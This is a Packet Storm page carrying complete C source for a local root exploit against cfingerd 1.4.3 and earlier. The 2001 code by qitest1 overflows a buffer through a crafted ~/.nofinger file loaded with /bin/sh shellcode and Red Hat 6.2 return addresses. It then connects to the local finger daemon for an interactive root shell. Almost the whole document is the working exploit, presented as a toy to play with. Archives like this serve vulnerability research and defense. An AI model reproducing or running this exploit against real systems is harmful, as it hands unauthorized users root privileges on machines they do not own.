Cfingerd v1.4.3 and below Linux/x86 local root buffer overflow exploit.
5e415ed8282123a93e68f4a857a9f0ce4671a2b5267122c13f0a903a573d4994/*
* cfingerd 1.4.3 and prior Linux x86 local root exploit
* by qitest1 10/07/2001
*
* This code successfully exploits the bof vulnerability found by
* Steven Van Acker <deepstar@ulyssis.org> and recently posted to
* bugtraq. If the ALLOW_LINE_PARSING option is set, and it is set
* by default, the bof simply occurs when reading the ~/.nofinger
* file. If cfingerd is called by inetd as root, a root shell will be
* spawned. But it is quite funny that the authors of cfingerd in the
* README almost seem to encourage people to set inetd.conf for
* calling cfingerd as root.
*
* Greets: my friends on #sikurezza@Undernet
* jtripper: hi man, play_the_game with me! =)
* warson and warex
*
* Fuck: fender'/hcezar: I want your respect..
*
* have fun with this 0x69 local toy! =)
*/
#include <stdio.h>
#include <pwd.h>
#include <sys/types.h>
#include <unistd.h>
#include <netinet/in.h>
#include <netdb.h>
#define RETPOS 84
#define LOCALHOST "localhost"
#define FINGERD_PORT 79
struct targ
{
int def;
char *descr;
u_long retaddr;
};
struct targ target[]=
{
{0, "Red Hat 6.2 with cfingerd 1.4.0 from tar.gz", 0xbffff660},
{1, "Red Hat 6.2 with cfingerd 1.4.1 from tar.gz", 0xbffff661},
{2, "Red Hat 6.2 with cfingerd 1.4.2 from tar.gz", 0xbffff662},
{3, "Red Hat 6.2 with cfingerd 1.4.3 from tar.gz", 0xbffff663},
{69, NULL, 0}
};
char shellcode[] = /* Aleph1 code */
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
int sel = 0, offset = 0;
void play_the_game(u_long retaddr, struct passwd *user);
int sockami(char *host, int port);
void shellami(int sock);
void usage(char *progname);
int
main(int argc, char **argv)
{
int sock, cnt;
uid_t euid;
char sbuf[256];
struct passwd *user;
printf("\n cfingerd 1.4.3 and prior exploit by qitest1\n\n");
while((cnt = getopt(argc,argv,"t:o:h")) != EOF)
{
switch(cnt)
{
case 't':
sel = atoi(optarg);
break;
case 'o':
offset = atoi(optarg);
break;
case 'h':
usage(argv[0]);
break;
}
}
euid = geteuid();
user = (struct passwd *)getpwuid(euid);
printf("+User: %s\n against: %s\n", user->pw_name, target[sel].descr);
target[sel].retaddr += offset;
printf("+Using: retaddr = %p...\n ok\n", target[sel].retaddr);
play_the_game(target[sel].retaddr, user);
sock = sockami(LOCALHOST, FINGERD_PORT);
sprintf(sbuf, "%s\n", user->pw_name);
send(sock, sbuf, strlen(sbuf), 0);
printf("+Waiting for a shell...\n 0x69 =)\n");
sleep(1);
shellami(sock);
}
void
play_the_game(u_long retaddr, struct passwd *user)
{
char zbuf[256], nofinger_path[256];
int i, n = 0;
FILE *nofinger_file;
memset(zbuf, '\x90', sizeof(zbuf));
for(i = RETPOS - strlen(shellcode); i < RETPOS; i++)
zbuf[i] = shellcode[n++];
zbuf[RETPOS + 0] = (u_char) (retaddr & 0x000000ff);
zbuf[RETPOS + 1] = (u_char)((retaddr & 0x0000ff00) >> 8);
zbuf[RETPOS + 2] = (u_char)((retaddr & 0x00ff0000) >> 16);
zbuf[RETPOS + 3] = (u_char)((retaddr & 0xff000000) >> 24);
zbuf[RETPOS + 4] = '\x00';
sprintf(nofinger_path, "%s/.nofinger", user->pw_dir);
nofinger_file = fopen(nofinger_path, "w");
printf("+Writing ~/.nofinger...\n");
fprintf(nofinger_file, "$%s\n", zbuf);
printf(" done\n");
fclose(nofinger_file);
return;
}
int
sockami(char *host, int port)
{
struct sockaddr_in address;
struct hostent *hp;
int sock;
sock = socket(AF_INET, SOCK_STREAM, 0);
if(sock == -1)
{
perror("socket()");
exit(-1);
}
hp = gethostbyname(host);
if(hp == NULL)
{
perror("gethostbyname()");
exit(-1);
}
memset(&address, 0, sizeof(address));
memcpy((char *) &address.sin_addr, hp->h_addr, hp->h_length);
address.sin_family = AF_INET;
address.sin_port = htons(port);
if(connect(sock, (struct sockaddr *) &address, sizeof(address)) == -1)
{
perror("connect()");
exit(-1);
}
return(sock);
}
void
shellami(int sock)
{
int n;
char recvbuf[1024], *cmd = "id; uname -a\n";
fd_set rset;
send(sock, cmd, strlen(cmd), 0);
while (1)
{
FD_ZERO(&rset);
FD_SET(sock, &rset);
FD_SET(STDIN_FILENO, &rset);
select(sock+1, &rset, NULL, NULL, NULL);
if(FD_ISSET(sock, &rset))
{
n = read(sock, recvbuf, 1024);
if (n <= 0)
{
printf("Connection closed by foreign host.\n");
exit(0);
}
recvbuf[n] = 0;
printf("%s", recvbuf);
}
if (FD_ISSET(STDIN_FILENO, &rset))
{
n = read(STDIN_FILENO, recvbuf, 1024);
if (n > 0)
{
recvbuf[n] = 0;
write(sock, recvbuf, n);
}
}
}
return;
}
void
usage(char *progname)
{
int i = 0;
printf("Usage: %s [options]\n", progname);
printf("Options:\n"
" -t target\n"
" -o offset\n"
" -h (help)\n"
"Available targets:\n");
while(target[i].def != 69)
{
printf(" %d) %s\n", target[i].def, target[i].descr);
i++;
}
exit(1);
}
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed